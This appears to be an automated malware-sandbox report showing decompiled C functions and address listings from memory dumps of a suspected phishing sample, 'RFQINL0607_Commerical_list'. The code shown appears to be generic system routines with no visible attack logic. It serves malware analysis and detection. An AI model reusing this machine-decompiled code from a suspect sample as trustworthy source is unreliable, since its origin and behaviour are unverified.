                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ff2dccf486cdcf4988ec8bda7214514f4488df7d4d2f4a17273e74668bd031a1
                                                                                                                                                                                  • Instruction ID: 04e170307cf4a8a04f983b9e645b4f06d6e292563171d068dac9f35d9d21168c
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff2dccf486cdcf4988ec8bda7214514f4488df7d4d2f4a17273e74668bd031a1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 23C124B1D017099FEB15CFA8C880B9EBBF4FF48754F14852AE41AAB750EB34A9018B55
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333582E0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                                                  			E333582E0(intOrPtr _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				char _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed short* _v92;
				intOrPtr _v96;
				signed int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed short* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v192;
				signed int _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				signed short* _v220;
				intOrPtr _v224;
				signed int _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				signed short* _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				char _v268;
				signed int _v272;
				signed int _v276;
				signed short _v280;
				signed short _v284;
				signed int _v288;
				signed int _v292;
				intOrPtr* _v296;
				signed short _v300;
				signed short _v304;
				signed int _v308;
				void* _v324;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t142;
				signed int _t144;
				intOrPtr _t153;
				void* _t154;
				signed int _t155;
				signed int _t162;
				signed short _t163;
				signed int _t166;
				signed short _t167;
				signed int _t172;
				signed int _t186;
				signed short _t187;
				signed int _t190;
				signed short _t191;
				intOrPtr _t196;
				signed int _t197;
				signed int _t200;
				signed int* _t201;
				signed int _t203;
				void* _t204;
				intOrPtr* _t205;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr* _t212;
				signed int _t213;
				intOrPtr* _t216;
				intOrPtr* _t224;
				signed int _t225;
				intOrPtr* _t229;
				void* _t233;
				signed int _t239;
				void* _t240;
				void* _t241;
				intOrPtr* _t242;
				intOrPtr* _t243;
				intOrPtr* _t245;
				void* _t246;
				intOrPtr* _t247;
				signed int _t249;
				signed int _t251;
				void* _t252;

				_t251 = (_t249 & 0xfffffff8) - 0x134;
				_v8 =  *0x3344b370 ^ _t251;
				_t203 = _a12;
				_t142 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_t245 =  *((intOrPtr*)(_t203 + 8));
				if(_t142 == 0) {
					L24:
					_t235 = _t203;
					E3342629A(_t245, _t203, __eflags);
					L10:
					_t239 = _a16;
					if(_t239 >=  *((intOrPtr*)(_t245 + 0xc))) {
						L22:
						_t144 = 0;
						L19:
						_pop(_t240);
						_pop(_t246);
						_pop(_t204);
						return E33394B50(_t144, _t204, _v8 ^ _t251, _t235, _t240, _t246);
					}
					asm("lfence");
					_t205 =  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0x10)) + 4 + _t239 * 4));
					E33398F40( &_v268, 0, 0x80);
					_v276 = 0;
					_t252 = _t251 + 0xc;
					_v272 = 0;
					_v304 = 0;
					_v300 = 0;
					if( *((intOrPtr*)(_t205 + 0x18)) == 0 || E33358470( &_v276) == 0) {
						L13:
						_t247 =  *((intOrPtr*)(_t245 + 0x10 + _t239 * 4));
						_v296 = _t247;
						E33398F40( &_v60, 0, 0x30);
						_t251 = _t252 + 0xc;
						if( *((intOrPtr*)(_t247 + 0x18)) == 0) {
							L18:
							_t144 =  *((intOrPtr*)(_t247 + 4));
							goto L19;
						}
						_v292 = 0;
						_v288 = 0;
						_t153 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
						if(_t153 == 0) {
							goto L18;
						}
						_t154 = _t153 + 0x7e0;
						if(_t154 == 0) {
							goto L18;
						}
						_t241 = _t154 + 0x30;
						if( *((intOrPtr*)(_t154 + 0x30)) == 0 ||  *((intOrPtr*)(_t154 + 0xc)) == 0) {
							goto L18;
						} else {
							_t206 =  *(_t154 + 0x10);
							_t155 = _t154 + 0x10;
							_v308 = _t155;
							_t235 =  *(_t155 + 4);
							__eflags = _t206 | _t235;
							if((_t206 | _t235) != 0) {
								L37:
								__eflags = _t206 | _t235;
								if((_t206 | _t235) == 0) {
									goto L18;
								}
								_t242 =  *_t247;
								_t212 = _t242;
								_v140 = _t247 + 0x60;
								_v136 = 0;
								_v132 = 0x10;
								_v128 = 0;
								_t107 = _t212 + 2; // 0x2
								_v296 = _t107;
								do {
									_t162 =  *_t212;
									_t212 = _t212 + 2;
									__eflags = _t162;
								} while (_t162 != 0);
								_t213 = _t212 - _v296;
								__eflags = _t213;
								_v108 = _t242;
								_t243 =  *((intOrPtr*)(_t247 + 0xc));
								_v120 = 0;
								_t163 = 2 + (_t213 >> 1) * 2;
								_v116 = 2;
								_v284 = _t163;
								_v124 =  &_v284;
								_t216 = _t243;
								_v100 = _t163 & 0x0000ffff;
								_v112 = 0;
								_t121 = _t216 + 2; // 0x2
								_v104 = 0;
								_v96 = 0;
								_v296 = _t121;
								do {
									_t166 =  *_t216;
									_t216 = _t216 + 2;
									__eflags = _t166;
								} while (_t166 != 0);
								_v88 = 0;
								_v84 = 2;
								_v80 = 0;
								_t167 = 2 + (_t216 - _v296 >> 1) * 2;
								_v76 = _t243;
								_v280 = _t167;
								_v68 = _t167 & 0x0000ffff;
								_v92 =  &_v280;
								_v72 = 0;
								_v64 = 0;
								E33381280(_t206, _t206, _t235, 0x33326970, 5,  &_v140);
								goto L18;
							}
							_t172 = E3334E0E0(0x3332694c, 0, 0,  &_v292);
							__eflags = _t172;
							if(_t172 != 0) {
								goto L18;
							}
							asm("lock cmpxchg8b [esi]");
							_t247 = _v296;
							_t206 = _t172;
							_v308 = 0;
							__eflags = _t172;
							if(_t172 == 0) {
								__eflags = 0;
								_t206 = _v292;
								_v308 = _v288;
								E33425F48(_t241, 0, _v292, _v288,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							} else {
								E33379A00(0, _v292, _v288, 0);
							}
							_t235 = _v308;
							goto L37;
						}
					} else {
						_t235 = _v276;
						__eflags = _t235 | _v272;
						if((_t235 | _v272) == 0) {
							goto L13;
						}
						_t224 =  *_t205;
						_v268 = _t205 + 0x20;
						_v264 = 0;
						_v260 = 0x10;
						_v256 = 0;
						_v308 = _t224 + 2;
						do {
							_t186 =  *_t224;
							_t224 = _t224 + 2;
							__eflags = _t186;
						} while (_t186 != 0);
						_t225 = _t224 - _v308;
						__eflags = _t225;
						_v248 = 0;
						_v244 = 2;
						_v240 = 0;
						_t187 = 2 + (_t225 >> 1) * 2;
						_v232 = 0;
						_v304 = _t187;
						_v252 =  &_v304;
						_t208 =  *((intOrPtr*)(_t205 + 4));
						_v236 =  *_t205;
						_t229 = _t208;
						_v228 = _t187 & 0x0000ffff;
						_v224 = 0;
						_v308 = _t229 + 2;
						do {
							_t190 =  *_t229;
							_t229 = _t229 + 2;
							__eflags = _t190;
						} while (_t190 != 0);
						_v216 = 0;
						_v212 = 2;
						_v208 = 0;
						_t191 = 2 + (_t229 - _v308 >> 1) * 2;
						_v204 = _t208;
						_v300 = _t191;
						_v196 = _t191 & 0x0000ffff;
						_v220 =  &_v300;
						_v200 = 0;
						_v192 = 0;
						E33381280(_t208, _t235, _v272, 0x33326960, 5,  &_v268);
						goto L13;
					}
				}
				_t233 = _t142 + 0x7e0;
				if(_t233 == 0 ||  *((intOrPtr*)(_t233 + 0x30)) == 0) {
					goto L24;
				} else {
					_t196 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t196 == 0) {
						L23:
						_t235 = 0;
						_t197 = 0;
						L7:
						if(_t235 !=  *_t245 || _t197 !=  *((intOrPtr*)(_t245 + 4))) {
							_t198 = _a8;
							goto L21;
						} else {
							_t198 = _a8;
							if(_a8 !=  *((intOrPtr*)(_t245 + 8))) {
								L21:
								_t235 = _t203;
								_t200 = E333584D8(_t245, _t203, __eflags, _t233 + 0x18, _t198);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L10;
								}
								goto L22;
							}
							goto L10;
						}
					}
					_t201 = _t196 + 0x7e0;
					if(_t201 == 0 || _t201[0xc] == 0) {
						goto L23;
					} else {
						_t235 =  *_t201;
						_t197 = _t201[1];
						goto L7;
					}
				}
			}




































































































                                                                                                                                                                                  0x333582e8
                                                                                                                                                                                  0x333582f5
                                                                                                                                                                                  0x33358303
                                                                                                                                                                                  0x33358307
                                                                                                                                                                                  0x3335830e
                                                                                                                                                                                  0x33358313
                                                                                                                                                                                  0x333b1b00
                                                                                                                                                                                  0x333b1b00
                                                                                                                                                                                  0x333b1b04
                                                                                                                                                                                  0x3335837c
                                                                                                                                                                                  0x3335837c
                                                                                                                                                                                  0x33358382
                                                                                                                                                                                  0x33358467
                                                                                                                                                                                  0x33358467
                                                                                                                                                                                  0x33358437
                                                                                                                                                                                  0x3335843e
                                                                                                                                                                                  0x3335843f
                                                                                                                                                                                  0x33358440
                                                                                                                                                                                  0x3335844b
                                                                                                                                                                                  0x3335844b
                                                                                                                                                                                  0x33358388
                                                                                                                                                                                  0x33358395
                                                                                                                                                                                  0x3335839e
                                                                                                                                                                                  0x333583a5
                                                                                                                                                                                  0x333583ad
                                                                                                                                                                                  0x333583b0
                                                                                                                                                                                  0x333583b8
                                                                                                                                                                                  0x333583bd
                                                                                                                                                                                  0x333583c5
                                                                                                                                                                                  0x333583d8
                                                                                                                                                                                  0x333583d8
                                                                                                                                                                                  0x333583e8
                                                                                                                                                                                  0x333583ec
                                                                                                                                                                                  0x333583f1
                                                                                                                                                                                  0x333583f8
                                                                                                                                                                                  0x33358434
                                                                                                                                                                                  0x33358434
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33358434
                                                                                                                                                                                  0x33358400
                                                                                                                                                                                  0x33358408
                                                                                                                                                                                  0x33358410
                                                                                                                                                                                  0x33358418
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335841a
                                                                                                                                                                                  0x3335841f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33358425
                                                                                                                                                                                  0x33358428
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b1c28
                                                                                                                                                                                  0x333b1c28
                                                                                                                                                                                  0x333b1c2b
                                                                                                                                                                                  0x333b1c2e
                                                                                                                                                                                  0x333b1c32
                                                                                                                                                                                  0x333b1c37
                                                                                                                                                                                  0x333b1c39
                                                                                                                                                                                  0x333b1cc1
                                                                                                                                                                                  0x333b1cc3
                                                                                                                                                                                  0x333b1cc5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b1ccb
                                                                                                                                                                                  0x333b1cd0
                                                                                                                                                                                  0x333b1cd2
                                                                                                                                                                                  0x333b1cd9
                                                                                                                                                                                  0x333b1ce4
                                                                                                                                                                                  0x333b1cef
                                                                                                                                                                                  0x333b1cfa
                                                                                                                                                                                  0x333b1cfd
                                                                                                                                                                                  0x333b1d01
                                                                                                                                                                                  0x333b1d01
                                                                                                                                                                                  0x333b1d04
                                                                                                                                                                                  0x333b1d07
                                                                                                                                                                                  0x333b1d07
                                                                                                                                                                                  0x333b1d0c
                                                                                                                                                                                  0x333b1d0c
                                                                                                                                                                                  0x333b1d12
                                                                                                                                                                                  0x333b1d19
                                                                                                                                                                                  0x333b1d1c
                                                                                                                                                                                  0x333b1d27
                                                                                                                                                                                  0x333b1d2e
                                                                                                                                                                                  0x333b1d3d
                                                                                                                                                                                  0x333b1d42
                                                                                                                                                                                  0x333b1d49
                                                                                                                                                                                  0x333b1d4e
                                                                                                                                                                                  0x333b1d55
                                                                                                                                                                                  0x333b1d60
                                                                                                                                                                                  0x333b1d63
                                                                                                                                                                                  0x333b1d6e
                                                                                                                                                                                  0x333b1d79
                                                                                                                                                                                  0x333b1d7d
                                                                                                                                                                                  0x333b1d7d
                                                                                                                                                                                  0x333b1d80
                                                                                                                                                                                  0x333b1d83
                                                                                                                                                                                  0x333b1d83
                                                                                                                                                                                  0x333b1d8e
                                                                                                                                                                                  0x333b1d99
                                                                                                                                                                                  0x333b1da4
                                                                                                                                                                                  0x333b1daf
                                                                                                                                                                                  0x333b1db6
                                                                                                                                                                                  0x333b1dbd
                                                                                                                                                                                  0x333b1dc9
                                                                                                                                                                                  0x333b1de1
                                                                                                                                                                                  0x333b1de8
                                                                                                                                                                                  0x333b1df3
                                                                                                                                                                                  0x333b1dfe
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b1dfe
                                                                                                                                                                                  0x333b1c4d
                                                                                                                                                                                  0x333b1c52
                                                                                                                                                                                  0x333b1c54
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b1c69
                                                                                                                                                                                  0x333b1c6d
                                                                                                                                                                                  0x333b1c73
                                                                                                                                                                                  0x333b1c75
                                                                                                                                                                                  0x333b1c79
                                                                                                                                                                                  0x333b1c7b
                                                                                                                                                                                  0x333b1c93
                                                                                                                                                                                  0x333b1c95
                                                                                                                                                                                  0x333b1c9b
                                                                                                                                                                                  0x333b1cb8
                                                                                                                                                                                  0x333b1c7d
                                                                                                                                                                                  0x333b1c88
                                                                                                                                                                                  0x333b1c88
                                                                                                                                                                                  0x333b1cbd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b1cbd
                                                                                                                                                                                  0x333b1b0e
                                                                                                                                                                                  0x333b1b0e
                                                                                                                                                                                  0x333b1b14
                                                                                                                                                                                  0x333b1b18
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b1b1e
                                                                                                                                                                                  0x333b1b23
                                                                                                                                                                                  0x333b1b27
                                                                                                                                                                                  0x333b1b2f
                                                                                                                                                                                  0x333b1b3a
                                                                                                                                                                                  0x333b1b42
                                                                                                                                                                                  0x333b1b46
                                                                                                                                                                                  0x333b1b46
                                                                                                                                                                                  0x333b1b49
                                                                                                                                                                                  0x333b1b4c
                                                                                                                                                                                  0x333b1b4c
                                                                                                                                                                                  0x333b1b51
                                                                                                                                                                                  0x333b1b51
                                                                                                                                                                                  0x333b1b57
                                                                                                                                                                                  0x333b1b5f
                                                                                                                                                                                  0x333b1b67
                                                                                                                                                                                  0x333b1b6f
                                                                                                                                                                                  0x333b1b76
                                                                                                                                                                                  0x333b1b82
                                                                                                                                                                                  0x333b1b87
                                                                                                                                                                                  0x333b1b8d
                                                                                                                                                                                  0x333b1b90
                                                                                                                                                                                  0x333b1b94
                                                                                                                                                                                  0x333b1b99
                                                                                                                                                                                  0x333b1b9d
                                                                                                                                                                                  0x333b1ba8
                                                                                                                                                                                  0x333b1bac
                                                                                                                                                                                  0x333b1bac
                                                                                                                                                                                  0x333b1baf
                                                                                                                                                                                  0x333b1bb2
                                                                                                                                                                                  0x333b1bb2
                                                                                                                                                                                  0x333b1bbd
                                                                                                                                                                                  0x333b1bc5
                                                                                                                                                                                  0x333b1bcd
                                                                                                                                                                                  0x333b1bd5
                                                                                                                                                                                  0x333b1bdc
                                                                                                                                                                                  0x333b1be0
                                                                                                                                                                                  0x333b1bec
                                                                                                                                                                                  0x333b1c03
                                                                                                                                                                                  0x333b1c08
                                                                                                                                                                                  0x333b1c13
                                                                                                                                                                                  0x333b1c1e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b1c1e
                                                                                                                                                                                  0x333583c5
                                                                                                                                                                                  0x33358319
                                                                                                                                                                                  0x33358321
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33358331
                                                                                                                                                                                  0x33358337
                                                                                                                                                                                  0x3335833f
                                                                                                                                                                                  0x333b1af7
                                                                                                                                                                                  0x333b1af7
                                                                                                                                                                                  0x333b1af9
                                                                                                                                                                                  0x3335835f
                                                                                                                                                                                  0x33358361
                                                                                                                                                                                  0x3335844e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33358370
                                                                                                                                                                                  0x33358370
                                                                                                                                                                                  0x33358376
                                                                                                                                                                                  0x33358451
                                                                                                                                                                                  0x33358455
                                                                                                                                                                                  0x3335845a
                                                                                                                                                                                  0x3335845f
                                                                                                                                                                                  0x33358461
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33358461
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33358376
                                                                                                                                                                                  0x33358361
                                                                                                                                                                                  0x33358345
                                                                                                                                                                                  0x3335834a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335835a
                                                                                                                                                                                  0x3335835a
                                                                                                                                                                                  0x3335835c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335835c
                                                                                                                                                                                  0x3335834a

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: bbee8fe5e988e92b720971433c5f8e2e6e5ab2bb414e532d8fb8c46e05d666be
                                                                                                                                                                                  • Instruction ID: 6e6dd02d2d34b2600b0f7c73c4f6048826b53691b879e79558a825aded4e5e54
                                                                                                                                                                                  • Opcode Fuzzy Hash: bbee8fe5e988e92b720971433c5f8e2e6e5ab2bb414e532d8fb8c46e05d666be
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CC157B46083448FE760CF15C894BABB7E4FF88345F44896DE9898B690DB74E944CF92
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334C3C7 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                                                  			E3334C3C7(signed int __ecx) {
				signed int _v8;
				char _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				short _v208;
				signed int _v210;
				short _v212;
				short _v214;
				char _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				char _v240;
				signed int _v244;
				intOrPtr _v248;
				char _v252;
				char* _v256;
				short _v258;
				char _v260;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t120;
				signed int _t123;
				void* _t127;
				signed int _t141;
				signed char _t142;
				signed int _t145;
				signed int _t153;
				void* _t161;
				short _t162;
				signed int _t177;
				void* _t178;
				void* _t179;
				signed int _t181;
				intOrPtr _t188;
				signed int _t191;
				signed int _t198;
				signed int _t201;
				signed int _t210;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t225;
				void* _t226;
				void* _t227;
				signed int _t228;
				signed int _t229;

				_v8 =  *0x3344b370 ^ _t229;
				_t228 = __ecx;
				_v220 = 0;
				_t225 = _t224 | 0xffffffff;
				_v228 = 0;
				_v244 = 0;
				_t177 = _t225;
				_v224 = _t177;
				_v236 = _t225;
				E33398F40( &_v188, 0, 0xaa);
				_t120 = E333939E0();
				asm("sbb al, al");
				_v240 =  ~_t120 + 1;
				_t123 =  *(_t228 + 4) & 0x0000ffff;
				if(_t123 == 0) {
					_push( &_v220);
					if(E33393EB0() < 0) {
						goto L31;
					}
					_t123 = _v220;
					goto L2;
				} else {
					_v220 = _t123;
					L2:
					_t187 = _t228;
					_t127 = E33375004(_t228, _t123, 0,  &_v236);
					if(_t127 == 0xc0000034 || _t127 == 0xc00000bb) {
						_t210 = 0x55;
						_v232 = _t225;
						_t188 = E3334D818(_t187, _t210);
						_v244 = _t188;
						if(_t188 != 0) {
							_v248 = _t188;
							_v252 = 0xaa0000;
							if(E33374F40(_v220 & 0x0000ffff,  &_v252) == 0) {
								goto L11;
							}
							_t161 = E3334D853( &_v232, _t228, _v248, "true",  &_v232);
							_t201 = _t225;
							if(_t161 >= 0) {
								_t201 = _v232;
							}
							_t162 = 0x31;
							_v216 = _t162;
							_v210 = _t201;
							_v214 = 0;
							_v212 = _v220;
							_v208 = 0;
							_v204 = 0;
							_v200 = 0;
							_v196 = 0;
							_v192 = 0;
							E3334CB1E(_t228,  &_v216, _v248);
							_t73 = _t228 + 0x14; // 0x16
							if(L3338A775(_t73,  &_v216, 0) < 0) {
								goto L11;
							} else {
								_t168 =  *(_t228 + 0x14);
								_t177 = ( *( *(_t228 + 0x14) + 6) & 0x0000ffff) - 1;
								goto L6;
							}
						}
						_t125 = 0xc0000017;
						goto L31;
					} else {
						if(_t127 < 0) {
							L11:
							if(_v240 != 0) {
								_t225 = _t177 & 0x0000ffff;
							}
							_t210 = _t225;
							E3334C5CA(_t228, _t210);
							_t191 =  *(_t228 + 0x14);
							_t178 = 0;
							if(0 >=  *(_t191 + 6)) {
								L17:
								_t177 = 0;
								if(0 >=  *(_t191 + 6)) {
									L25:
									_t225 = 0;
									if(0 >=  *(_t191 + 6)) {
										L29:
										_t135 = _v244;
										if(_v244 != 0) {
											E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t135);
										}
										_t125 = 0;
										L31:
										return E33394B50(_t125, _t177, _v8 ^ _t229, _t210, _t225, _t228);
									}
									_t179 = 0;
									do {
										if(( *(_t179 +  *((intOrPtr*)(_t191 + 0xc))) & 0x00000004) != 0) {
											E3340CF65(_t228, _t225);
											_t210 =  *(_t228 + 0x14);
										}
										_t225 = _t225 + 1;
										_t179 = _t179 + 0x1c;
										_t191 = _t210;
									} while (_t225 < ( *(_t210 + 6) & 0x0000ffff));
									goto L29;
								}
								_t214 = _t191;
								_t226 = 0;
								do {
									_t141 =  *((intOrPtr*)(_t214 + 0xc));
									_t191 = _t214;
									_v236 = _t141;
									_t142 =  *(_t141 + _t226) & 0x0000ffff;
									_v232 = _t142;
									if((_t142 & 0x00000021) == 0x21) {
										_t145 = _v232;
										if((_t145 & 0x00001000) == 0) {
											_v228 = _v228 + 1;
										}
										_t191 = _t214;
										if(_v240 != 0 && _t177 != _v224) {
											_t191 = _t214;
											if(_v228 >  *((intOrPtr*)(_t228 + 0x48))) {
												 *((short*)(_v236 + _t226)) = _t145 & 0x0000ffdf;
												 *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t226) =  *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t226) | 0x00008000;
												_t191 =  *(_t228 + 0x14);
											}
										}
									}
									_t177 = _t177 + 1;
									_t226 = _t226 + 0x1c;
									_t214 = _t191;
								} while (_t177 < ( *(_t191 + 6) & 0x0000ffff));
								goto L25;
							} else {
								_t216 = _t191;
								_t227 = 0;
								do {
									if(( *(_t227 +  *((intOrPtr*)(_t216 + 0xc))) & 0x00000022) == 0x22) {
										E3340D16A(_t228, _t178);
										_t153 =  *(_t228 + 0x14);
										_t198 =  *((intOrPtr*)(_t153 + 0xc));
										_v232 = _t198;
										_t218 =  *(_t198 + _t227) & 0x0000ffff;
										if((_t218 & 0x00001000) == 0) {
											_v228 = _v228 + 1;
										}
										_t191 = _t153;
										if(_v240 != 0 && _t178 != _v224 && _v228 >  *((intOrPtr*)(_t228 + 0x48))) {
											 *((short*)(_v232 + _t227)) = _t218 & 0x0000ffdf;
											 *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t227) =  *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t227) | 0x00008000;
											_t191 =  *(_t228 + 0x14);
										}
									}
									_t178 = _t178 + 1;
									_t227 = _t227 + 0x1c;
									_t216 = _t191;
								} while (_t178 < ( *(_t191 + 6) & 0x0000ffff));
								goto L17;
							}
						} else {
							_t177 = _v236;
							_t168 =  *(_t228 + 0x14);
							L6:
							_v224 = _t177;
							if(_t177 == _t225) {
								goto L11;
							}
							_t181 = _t177 * 0x1c;
							_v256 =  &_v188;
							_v258 = 0xaa;
							if(E3334C6A0(_t228,  *((intOrPtr*)(_t168 + 0xc)) + _t181,  &_v260) >= 0) {
								if(E333743AC(_t228, _v256) < 0) {
									 *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t181) =  *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t181) & 0x0000ffdf;
									 *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t181) =  *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t181) | 0x00008000;
								} else {
									_v228 = 1;
								}
							}
							_t177 = _v224;
							goto L11;
						}
					}
				}
			}
























































                                                                                                                                                                                  0x3334c3d9
                                                                                                                                                                                  0x3334c3e1
                                                                                                                                                                                  0x3334c3e8
                                                                                                                                                                                  0x3334c3f1
                                                                                                                                                                                  0x3334c3f4
                                                                                                                                                                                  0x3334c3fa
                                                                                                                                                                                  0x3334c400
                                                                                                                                                                                  0x3334c408
                                                                                                                                                                                  0x3334c40f
                                                                                                                                                                                  0x3334c416
                                                                                                                                                                                  0x3334c41e
                                                                                                                                                                                  0x3334c425
                                                                                                                                                                                  0x3334c429
                                                                                                                                                                                  0x3334c42f
                                                                                                                                                                                  0x3334c436
                                                                                                                                                                                  0x333a9ded
                                                                                                                                                                                  0x333a9df5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a9dfb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334c43c
                                                                                                                                                                                  0x3334c43c
                                                                                                                                                                                  0x3334c443
                                                                                                                                                                                  0x3334c44f
                                                                                                                                                                                  0x3334c451
                                                                                                                                                                                  0x3334c45b
                                                                                                                                                                                  0x333a9e09
                                                                                                                                                                                  0x333a9e0a
                                                                                                                                                                                  0x333a9e16
                                                                                                                                                                                  0x333a9e18
                                                                                                                                                                                  0x333a9e20
                                                                                                                                                                                  0x333a9e33
                                                                                                                                                                                  0x333a9e41
                                                                                                                                                                                  0x333a9e52
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a9e69
                                                                                                                                                                                  0x333a9e6e
                                                                                                                                                                                  0x333a9e73
                                                                                                                                                                                  0x333a9e75
                                                                                                                                                                                  0x333a9e75
                                                                                                                                                                                  0x333a9e7e
                                                                                                                                                                                  0x333a9e85
                                                                                                                                                                                  0x333a9e94
                                                                                                                                                                                  0x333a9e9b
                                                                                                                                                                                  0x333a9eab
                                                                                                                                                                                  0x333a9eb4
                                                                                                                                                                                  0x333a9ebb
                                                                                                                                                                                  0x333a9ec1
                                                                                                                                                                                  0x333a9ec7
                                                                                                                                                                                  0x333a9ecd
                                                                                                                                                                                  0x333a9ed3
                                                                                                                                                                                  0x333a9ed8
                                                                                                                                                                                  0x333a9eea
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a9ef0
                                                                                                                                                                                  0x333a9ef0
                                                                                                                                                                                  0x333a9ef7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a9ef7
                                                                                                                                                                                  0x333a9eea
                                                                                                                                                                                  0x333a9e22
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334c46c
                                                                                                                                                                                  0x3334c46e
                                                                                                                                                                                  0x3334c4db
                                                                                                                                                                                  0x3334c4e2
                                                                                                                                                                                  0x3334c4e4
                                                                                                                                                                                  0x3334c4e4
                                                                                                                                                                                  0x3334c4e7
                                                                                                                                                                                  0x3334c4eb
                                                                                                                                                                                  0x3334c4f0
                                                                                                                                                                                  0x3334c4f5
                                                                                                                                                                                  0x3334c4fb
                                                                                                                                                                                  0x3334c521
                                                                                                                                                                                  0x3334c523
                                                                                                                                                                                  0x3334c529
                                                                                                                                                                                  0x3334c582
                                                                                                                                                                                  0x3334c584
                                                                                                                                                                                  0x3334c58a
                                                                                                                                                                                  0x3334c5ab
                                                                                                                                                                                  0x3334c5ab
                                                                                                                                                                                  0x3334c5b3
                                                                                                                                                                                  0x333a9fef
                                                                                                                                                                                  0x333a9fef
                                                                                                                                                                                  0x3334c5b9
